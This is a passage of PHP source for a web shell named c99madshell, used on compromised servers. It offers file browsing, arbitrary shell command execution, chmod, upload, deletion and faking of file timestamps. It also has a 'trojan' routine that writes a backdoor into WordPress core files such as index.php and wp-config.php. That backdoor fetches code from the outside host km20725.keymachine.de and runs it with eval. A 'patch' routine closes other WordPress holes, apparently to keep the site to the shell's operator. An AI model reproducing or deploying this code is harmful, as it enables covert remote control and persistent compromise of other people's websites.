case 'blog_name_sql': $file = $wp_path.'wp-trackback.php'; break; | |
case 'tb_id': $file = $wp_path.'wp-trackback.php'; break; | |
case 'index': $file = $wp_path.'index.php'; break; | |
case 'wp-blog-header': $file = $wp_path.'wp-blog-header.php'; break; | |
case 'wp-config': $file = $wp_path.'wp-config.php'; break; | |
case 'wp-settings': $file = $wp_path.'wp-settings.php'; break; | |
case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break; | |
case 'template': $file = $wp_path.'wp-trackback.ph'; break; | |
default: return false; | |
} | |
if(!is_writable($file) && is_patching($vuln, $file)) { | |
$style = 'background-color: yellow; color: black" disabled'; | |
} elseif(is_writable($file) && is_patching($vuln, $file)) { | |
$style = 'background-color: yellow; color: black" disabled'; | |
} elseif(is_writable($file) && !is_patching($vuln, $file)) { | |
$style = 'background-color: green; color: white"'; | |
} else { | |
$style = 'background-color: #800000; color: #FFFFFF" disabled'; | |
} | |
return $style; | |
} | |
function is_patching($vuln, $file) { | |
if($vuln == 'index' || $vuln == 'wp-blog-header' || $vuln == 'wp-config' || $vuln == 'wp-settings' || $vuln == 'template-loader' || $vuln == 'template') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, 'km20725.keymachine.de') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} elseif($vuln == 'xmlrpc1') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '//\'pingback.ping\' => \'this:pingback_ping\',') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} elseif($vuln == 'xmlrpc2') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} elseif($vuln == 'admin_ajax') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '$user_login = $wpdb->escape($user_login);') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} elseif($vuln == 'blog_name_sql') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '$blog_name = $wpdb->escape($blog_name);') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} elseif($vuln == 'tb_id') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '$tb_id = intval($tb_id);') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
} | |
?> | |
<p align="left"><?php | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (empty($d)) {$d = @realpath(".");} elseif(@realpath($d)) {$d = @realpath($d);} | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$d = str_replace("\\\\","\\",$d); | |
$dispd = htmlspecialchars($d); | |
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); | |
$i = 0; | |
foreach($pd as $b) | |
{ | |
$t = ""; | |
$j = 0; | |
foreach ($e as $r) | |
{ | |
$t.= $r.DIRECTORY_SEPARATOR; | |
if ($j == $i) {break;} | |
$j++; | |
} | |
echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; | |
$i++; | |
} | |
echo " "; | |
if (@is_writable($d)) | |
{ | |
$wd = TRUE; | |
$wdt = "<font color=green>[ ok ]</font>"; | |
echo "<b><font color=green>".view_perms(@fileperms($d))."</font></b>"; | |
} | |
else | |
{ | |
$wd = FALSE; | |
$wdt = "<font color=red>[ Read-Only ]</font>"; | |
echo "<b>".view_perms_color($d)."</b>"; | |
} | |
echo "<br>"; | |
$letters = ""; | |
if ($win) | |
{ | |
$v = explode("\\",$d); | |
$v = $v[0]; | |
foreach (range("a","z") as $letter) | |
{ | |
$bool = $isdiskette = in_array($letter,$safemode_diskettes); | |
if (!$bool) {$bool = @is_dir($letter.":\\");} | |
if ($bool) | |
{ | |
$letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ "; | |
if (strtolower($letter.':') != strtolower($v)) {$letters .= $letter;} | |
else {$letters .= "<font color=\"#00FF66\">".$letter."</font>";} | |
$letters .= " ]</a> "; | |
} | |
} | |
if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} | |
} | |
if (count($quicklaunch) > 0) | |
{ | |
foreach($quicklaunch as $item) | |
{ | |
$item[1] = str_replace("%d",urlencode($d),$item[1]); | |
$item[1] = str_replace("%sort",$sort,$item[1]); | |
$v = @realpath($d.".."); | |
if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} | |
$item[1] = str_replace("%upd",urlencode($v),$item[1]); | |
echo "<a href=\"".$item[1]."\">".$item[0]."</a> "; | |
} | |
} | |
echo "</p></td></tr></table><br>"; | |
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} | |
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; | |
if ($act == "") {$act = $dspact = "ls";} | |
if($act == 'patch') { | |
$vuln = $wp_act; | |
if($vuln == 'xmlrpc1') { | |
$content = @implode('', @file($wp_path.'xmlrpc.php')); | |
$content = str_replace('\'pingback.ping\' => \'this:pingback_ping\',', '//\'pingback.ping\' => \'this:pingback_ping\',', $content); | |
$result = save_file($wp_path.'xmlrpc.php', $content); | |
} elseif($vuln == 'xmlrpc2') { | |
$content = @implode('', @file($wp_path.'xmlrpc.php')); | |
$content = str_replace('\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',', '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',', $content); | |
$result = save_file($wp_path.'xmlrpc.php', $content); | |
} elseif($vuln == 'admin_ajax') { | |
if(file_exists($wp_path.'wp-includes/pluggable.php')) { | |
$content = @implode('', @file($wp_path.'wp-includes/pluggable.php')); | |
$content = str_replace('$user_login = sanitize_user( $user_login );', '$user_login = sanitize_user( $user_login );'."\n\t".'$user_login = $wpdb->escape($user_login); ', $content); | |
$result = save_file($wp_path.'wp-includes/pluggable.php', $content); | |
} | |
if(file_exists($wp_path.'wp-includes/pluggable-functions.php')) { | |
$content = @implode('', @file($wp_path.'wp-includes/pluggable-functions.php')); | |
$content = str_replace('$user_login = sanitize_user( $user_login );', '$user_login = sanitize_user( $user_login );'."\n\t".'$user_login = $wpdb->escape($user_login); ', $content); | |
$result = save_file($wp_path.'wp-includes/pluggable-functions.php', $content); | |
} | |
} elseif($vuln == 'blog_name_sql') { | |
$content = @implode('', @file($wp_path.'wp-trackback.php')); | |
$content = str_replace('if ( is_single() || is_page() )', '$blog_name = $wpdb->escape($blog_name);'."\n".'if ( is_single() || is_page() )', $content); | |
$result = save_file($wp_path.'wp-trackback.php', $content); | |
} elseif($vuln == 'tb_id') { | |
$content = @implode('', @file($wp_path.'wp-trackback.php')); | |
preg_match('%\$tb_url(\s+)= \$_POST\[\'url\'\];%i', $content, $ret); | |
$content = str_replace('$tb_url'.$ret[1].'= $_POST[\'url\'];', '$tb_id = intval($tb_id); '."\n".'$tb_url = $_POST[\'url\'];', $content); | |
$result = save_file($wp_path.'wp-trackback.php', $content); | |
} else { | |
$result = false; | |
} | |
if(isset($result) && $result) { | |
echo('<center><font color="green"><b>Patching OK!!!</b></font></center>'); | |
echo('<script>document.getElementById(\''.$vuln.'\').style.cssText="font-size: 6pt;background-color: yellow; color: black";document.getElementById(\''.$vuln.'\').disabled=true;</script>'); | |
} else { | |
echo('<center><font color="red"><b>Patching NO!!!</b></font></center>'); | |
} | |
$d = $wp_path; | |
$act = 'ls'; | |
} | |
if($act =='trojan') { | |
switch($wp_act) { | |
case 'index': $file = $wp_path.'index.php'; break; | |
case 'wp-blog-header': $file = $wp_path.'wp-blog-header.php'; break; | |
case 'wp-config': $file = $wp_path.'wp-config.php'; break; | |
case 'wp-settings': $file = $wp_path.'wp-settings.php'; break; | |
case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break; | |
//case 'template': $file = $wp_path.'wp-trackback.ph'; break; | |
} | |
$content = @implode('', @file($file)); | |
if(@ini_get('allow_url_fopen')==1) { | |
$trojan = '<?php if(isset($_GET[\'p\'])) { | |
@eval(@file_get_contents(\'http://km20725.keymachine.de/server/index.php?host=\'.$_SERVER[\'SERVER_NAME\'].\'&p=\'.$_GET[\'p\'])); | |
} ?>'."\n"; | |
} else { | |
$trojan = '<?php if(isset($_GET[\'p\'])) { | |
$sock = @fsockopen(\'km20725.keymachine.de\', 80); | |
if($sock){ | |
fwrite ($sock, \'GET http://km20725.keymachine.de/server/index.php?host=\'.$_SERVER[\'SERVER_NAME\'].\'&p=\'.$_GET[\'p\'].\' HTTP/1.0\'."\r\n"); | |
fwrite ($sock, \'Host: km20725.keymachine.de\'."\r\n\r\n"); | |
while($content[] = fgets ($sock)); | |
$content = implode(\'\', $content); | |
@eval(trim(substr($content, strpos($content, "\r\n\r\n")))); | |
fclose ($sock);} | |
} ?>'."\n"; | |
} | |
$content = $trojan.$content; | |
$result = save_file($file, $content); | |
if($result) { | |
echo('<center><font color="green"><b>Trojaning OK!!!</b></font></center>'); | |
echo('<script>document.getElementById(\''.$wp_act.'\').style.cssText="font-size: 6pt;background-color: yellow; color: black";document.getElementById(\''.$wp_act.'\').disabled=true;</script>'); | |
} else { | |
echo('<center><font color="red"><b>Trojaning NO!!!</b></font></center>'); | |
} | |
$d = $wp_path; | |
$act = 'ls'; | |
} | |
if ($act == "mkdir") | |
{ | |
if ($mkdir != $d) | |
{ | |
if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} | |
elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} | |
echo "<br><br>"; | |
} | |
$act = $dspact = "ls"; | |
} | |
if ($act == "d") | |
{ | |
if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} | |
else | |
{ | |
echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; | |
if (!$win) | |
{ | |
echo "<tr><td><b>Owner/Group</b></td><td> "; | |
$ow = posix_getpwuid(fileowner($d)); | |
$gr = posix_getgrgid(filegroup($d)); | |
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); | |
} | |
echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; | |
} | |
} | |
if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} | |
if ($act == "mkfile") | |
{ | |
if ($mkfile != $d) | |
{ | |
if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} | |
elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} | |
else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} | |
} | |
else {$act = $dspact = "ls";} | |
} | |
if ($act == "selfremove") | |
{ | |
if (($submit == $rndcode) and ($submit != "")) | |
{ | |
if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } | |
else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} | |
} | |
else | |
{ | |
if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} | |
$rnd = rand(0,9).rand(0,9).rand(0,9); | |
echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; | |
} | |
} | |
if($act == 'touch') { | |
if(is_link($d.$f) || $f == '.' || $f == '..') { | |
echo('<font color="red">ONLY FILE AND CATALOGS!!!</font>'); | |
$act = 'ls'; | |
} else { | |
if(!isset($submit)) { | |
$time_array = explode(':',@date("d:m:Y:H:i:s",@filemtime($d.$f))); | |
echo(" | |
<form method=\"POST\"> | |
<input name='act' type='hidden' value='touch'> | |
<input name='f' type='hidden' value='".urlencode($f)."'> | |
<input name='d' type='hidden' value='".urlencode($d)."'> | |
<input type=submit name=submit value=\"Save\"> | |
<input type=\"reset\" value=\"Reset\"> | |
<input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br>Current file's time: ".@date("d.m.Y H:i:s", filemtime($d.$f)).' | |
<br />Set new date: | |
<select name="day" size="1">'); | |
echo($time_array[0]); | |
for($i=1;$i<32;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[0]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select> | |
<b>Month</b> | |
<select name="month" size="1"> | |
<option value="January" '.(($time_array[1]=='01')?'selected':'').'>January ---(01)</option> | |
<option value="February" '.(($time_array[1]=='02')?'selected':'').'>February --(02)</option> | |
<option value="March" '.(($time_array[1]=='03')?'selected':'').'>March ------(03)</option> | |
<option value="April" '.(($time_array[1]=='04')?'selected':'').'>April --------(04)</option> | |
<option value="May" '.(($time_array[1]=='05')?'selected':'').'>May ---------(05)</option> | |
<option value="June" '.(($time_array[1]=='06')?'selected':'').'>June --------(06)</option> | |
<option value="July" '.(($time_array[1]=='07')?'selected':'').'>July ---------(07)</option> | |
<option value="August" '.(($time_array[1]=='08')?'selected':'').'>August -----(08)</option> | |
<option value="September" '.(($time_array[1]=='09')?'selected':'').'>September -(09)</option> | |
<option value="October" '.(($time_array[1]=='10')?'selected':'').'>October ----(10)</option> | |
<option value="November" '.(($time_array[1]=='11')?'selected':'').'>November --(11)</option> | |
<option value="December" '.(($time_array[1]=='12')?'selected':'').'>December --(12)</option> | |
</select> | |
<b>Year</b> | |
<select name="year" size="1">'); | |
echo($time_array[0]); | |
for($i=1998;$i<2010;++$i) { | |
echo('<option value="'.$i.'" '.(($time_array[2]==$i)?' selected':'').'>'.$i.'</option>'); | |
} | |
echo('</select> | |
<b>Hour </b> | |
<select name="chasi" size="1">'); | |
echo($time_array[0]); | |
for($i=1;$i<60;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[3]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select> | |
<b>Minute </b> | |
<select name="minutes" size="1">'); | |
echo($time_array[0]); | |
for($i=1;$i<60;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[4]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select> | |
<b>Second </b> | |
<select name="second" size="1">'); | |
echo($time_array[0]); | |
for($i=1;$i<60;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[5]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select></form>'); | |
$act = 'ls'; | |
} else { | |
$datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; | |
$datar = @strtotime($datar); | |
if(@touch($d.$f,$datar,$datar)) { | |
echo('<center><b><font color=green>Time was been change successfull</font></b></center>'); | |
} else { | |
echo('<center><b><font color=red>Time NOT changed!!!</font></b></center>'); | |
} | |
$act = 'ls'; | |
} | |
} | |
} | |
if ($act == "search") | |
{ | |
echo "<b>Search in file-system:</b><br>"; | |
if (empty($search_in)) {$search_in = $d;} | |
if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} | |
if (empty($search_text_wwo)) {$search_text_regexp = 0;} | |
if (!empty($submit)) | |
{ | |
$found = array(); | |
$found_d = 0; | |
$found_f = 0; | |
$search_i_f = 0; | |
$search_i_d = 0; | |
$a = array | |
( | |
"name"=>@$search_name, "name_regexp"=>@$search_name_regexp, | |
"text"=>@$search_text, "text_regexp"=>@$search_text_regxp, | |
"text_wwo"=>@$search_text_wwo, | |
"text_cs"=>@$search_text_cs, | |
"text_not"=>@$search_text_not | |
); | |
$in = array_unique(explode(";",$search_in)); | |
foreach($in as $v) {c99fsearch($v);} | |
if (count($found) == 0) {echo "<b>No files found!</b>";} | |
else | |
{ | |
$ls_arr = $found; | |
$disp_fullpath = TRUE; | |
$act = "ls"; | |
} | |
} | |
echo "<form method=POST> | |
<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> | |
<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp | |
<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> | |
<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".@htmlspecialchars($search_text)."</textarea> | |
<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".(@$search_text_regexp == 1?" checked":"")."> - regexp | |
<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".(@$search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only | |
<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".(@$search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive | |
<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".(@$search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text | |
<br><br><input type=submit name=submit value=\"Search\"></form>"; | |
} | |
if ($act == "chmod") | |
{ | |
$mode = fileperms($d.$f); | |
if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} | |
else | |
{ | |
$form = TRUE; | |
if (isset($chmod_submit)) | |
{ | |
if(empty($hand)) { | |
$octet = '0'.base_convert((isset($chmod_o["r"])?1:0).(isset($chmod_o["w"])?1:0).(isset($chmod_o["x"])?1:0).(isset($chmod_g["r"])?1:0).(isset($chmod_g["w"])?1:0).(isset($chmod_g["x"])?1:0).(isset($chmod_w["r"])?1:0).(isset($chmod_w["w"])?1:0).(isset($chmod_w["x"])?1:0),2,8); | |
} else { | |
if(substr($hand,0,1)==0) { $octet = $hand; } else {$octet = '0'.$hand; } | |
} | |
if(!isset($recurs)) $recurs = 0; | |
if(is_dir($d.$f) && $recurs== 1) { | |
$result = setRecursPerm($d.$f,intval($octet,8)); | |
list($good, $bad) = explode(':', $result); | |
echo('<b>Result: <font color="green">'.$good.'=> Success</font>, <font color="red">'.$bad.'=>BAD</font><b><br>'); | |
} else { | |
if (@chmod($d.$f,intval($octet,8))) { | |
clearstatcache(); | |
$act = 'ls'; | |
$form = FALSE; | |
$err = ''; | |
} else { | |
$err = 'Can\'t chmod to '.$octet.'.'; | |
} | |
} | |
} | |
if ($form) | |
{ | |
$perms = parse_perms($mode); | |
echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".(isset($err)?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=text name=hand value=\"\"><br />"; | |
if(is_dir($d.$f)) { | |
echo "<input type=checkbox NAME=recurs value=1 checked=\"checked\"> Use recursive<br>"; | |
} | |
echo "<br><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; | |
} | |
} | |
} | |
if ($act == "upload") { | |
$uploadmess = ''; | |
if(isset($_FILES['uploadfile']) && !empty($_FILES['uploadfile']['tmp_name'])) { | |
$uploadpath = $d; | |
$destin = $_FILES['uploadfile']["name"]; | |
if (!move_uploaded_file($_FILES['uploadfile']['tmp_name'],$uploadpath.$destin)) {$uploadmess .= "<font color=red>Error uploading file ".$_FILES['uploadfile']['name']." (can't copy \"".$_FILES['uploadfile']['tmp_name']."\" to \"".$uploadpath.$destin."\"!</font><br>";} else { | |
$uploadmess = '<font color=green>File success uploaded</font>'; | |
} | |
} | |
echo "<center><b>".$uploadmess."</b></center>"; | |
$act = 'ls'; | |
} | |
if ($act == "delete") | |
{ | |
$delerr = ""; | |
foreach ($actbox as $v) | |
{ | |
$result = FALSE; | |
$result = fs_rmobj($v); | |
if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} | |
} | |
if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} | |
$act = "ls"; | |
} | |
if ($act == "cmd") | |
{ | |
@chdir($chdir); | |
if (!empty($submit)) | |
{ | |
echo "<b>Result of execution this command</b>:<br>"; | |
$olddir = realpath("."); | |
@chdir($d); | |
$ret = myshellexec($cmd); | |
$ret = convert_cyr_string($ret,"d","w"); | |
if ($cmd_txt) | |
{ | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
@chdir($olddir); | |
} | |
else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} | |
echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".@htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; | |
} | |
if ($act == "ls") | |
{ | |
if (count($ls_arr) > 0) {$list = $ls_arr;} | |
else | |
{ | |
$list = array(); | |
if ($h = @opendir($d)) | |
{ | |
while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} | |
closedir($h); | |
} | |
else {} | |
} | |
if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} | |
else | |
{ | |
//Building array | |
$objects = array(); | |
$vd = "f"; //Viewing mode | |
if ($vd == "f") | |
{ | |
$objects["head"] = array(); | |
$objects["folders"] = array(); | |
$objects["links"] = array(); | |
$objects["files"] = array(); | |
foreach ($list as $v) | |
{ | |
$o = @basename($v); | |
$row = array(); | |
if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} | |
elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} | |
elseif (is_dir($v)) | |
{ | |
if (@is_link($v)) {$type = "LINK";} | |
else {$type = "DIR";} | |
$row[] = $v; | |
$row[] = $type; | |
} | |
elseif(@is_file($v)) {$row[] = $v; $row[] = @filesize($v);} | |
$row[] = @filemtime($v); | |
if (!$win) | |
{ | |
$ow = @posix_getpwuid(@fileowner($v)); | |
$gr = @posix_getgrgid(@filegroup($v)); | |
$row[] = ($ow["name"]?$ow["name"]:@fileowner($v))."/".($gr["name"]?$gr["name"]:@filegroup($v)); | |
} | |
$row[] = @fileperms($v); | |
if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} | |
elseif (@is_link($v)) {$objects["links"][] = $row;} | |
elseif (@is_dir($v)) {$objects["folders"][] = $row;} | |
elseif (@is_file($v)) {$objects["files"][] = $row;} | |
$i++; | |
} | |
$row = array(); | |
$row[] = "<b>Name</b>"; | |
$row[] = "<b>Size</b>"; | |
$row[] = "<b>Modify</b>"; | |
if (!$win) | |
{$row[] = "<b>Owner/Group</b>";} | |
$row[] = "<b>Perms</b>"; | |
$row[] = "<b>Action</b>"; | |
$parsesort = parsesort($sort); | |
$sort = $parsesort[0].$parsesort[1]; | |
$k = $parsesort[0]; | |
if ($parsesort[1] != "a") {$parsesort[1] = "d";} | |
$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">"; | |
$row[$k] .= $y; | |
for($i=0;$i<count($row)-1;$i++) | |
{ | |
if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";} | |
} | |
$v = $parsesort[0]; | |
usort($objects["folders"], "tabsort"); | |
usort($objects["links"], "tabsort"); | |
usort($objects["files"], "tabsort"); | |
if ($parsesort[1] == "d") | |
{ | |
$objects["folders"] = array_reverse($objects["folders"]); | |
$objects["files"] = array_reverse($objects["files"]); | |
} | |
$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); | |
$tab = array(); | |
$tab["cols"] = array($row); | |
$tab["head"] = array(); | |
$tab["folders"] = array(); | |
$tab["links"] = array(); | |
$tab["files"] = array(); | |
$i = 0; | |
foreach ($objects as $a) | |
{ | |
$v = $a[0]; | |
$o = basename($v); | |
$dir = dirname($v); | |
if ($disp_fullpath) {$disppath = $v;} | |
else {$disppath = $o;} | |
$disppath = str2mini($disppath,60); | |
$uo = urlencode($o); | |
$ud = urlencode($dir); | |
$uv = urlencode($v); | |
$row = array(); | |
if ($o == ".") | |
{ | |
$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(@realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; | |
$row[] = "LINK"; | |
} | |
elseif ($o == "..") | |
{ | |
$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(@realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; | |
$row[] = "LINK"; | |
} | |
elseif (is_dir($v)) | |
{ | |
if (is_link($v)) | |
{ | |
$disppath .= " => ".readlink($v); | |
$type = "LINK"; | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; } | |
else | |
{ | |
$type = "DIR"; | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; | |
} | |
$row[] = $type; | |
} | |
elseif(is_file($v)) | |
{ | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.ft.value='edit';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>"; | |
$row[] = view_size($a[1]); | |
} | |
$row[] = '<a href="#" onclick="document.todo.act.value=\'touch\';document.todo.d.value=\''.$ud.'\';document.todo.f.value=\''.$uo.'\';document.todo.submit();">'.@date("d.m.Y H:i:s",$a[2]).'</a>'; | |
if (!$win) {$row[] = $a[3];} | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>"; | |
if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} | |
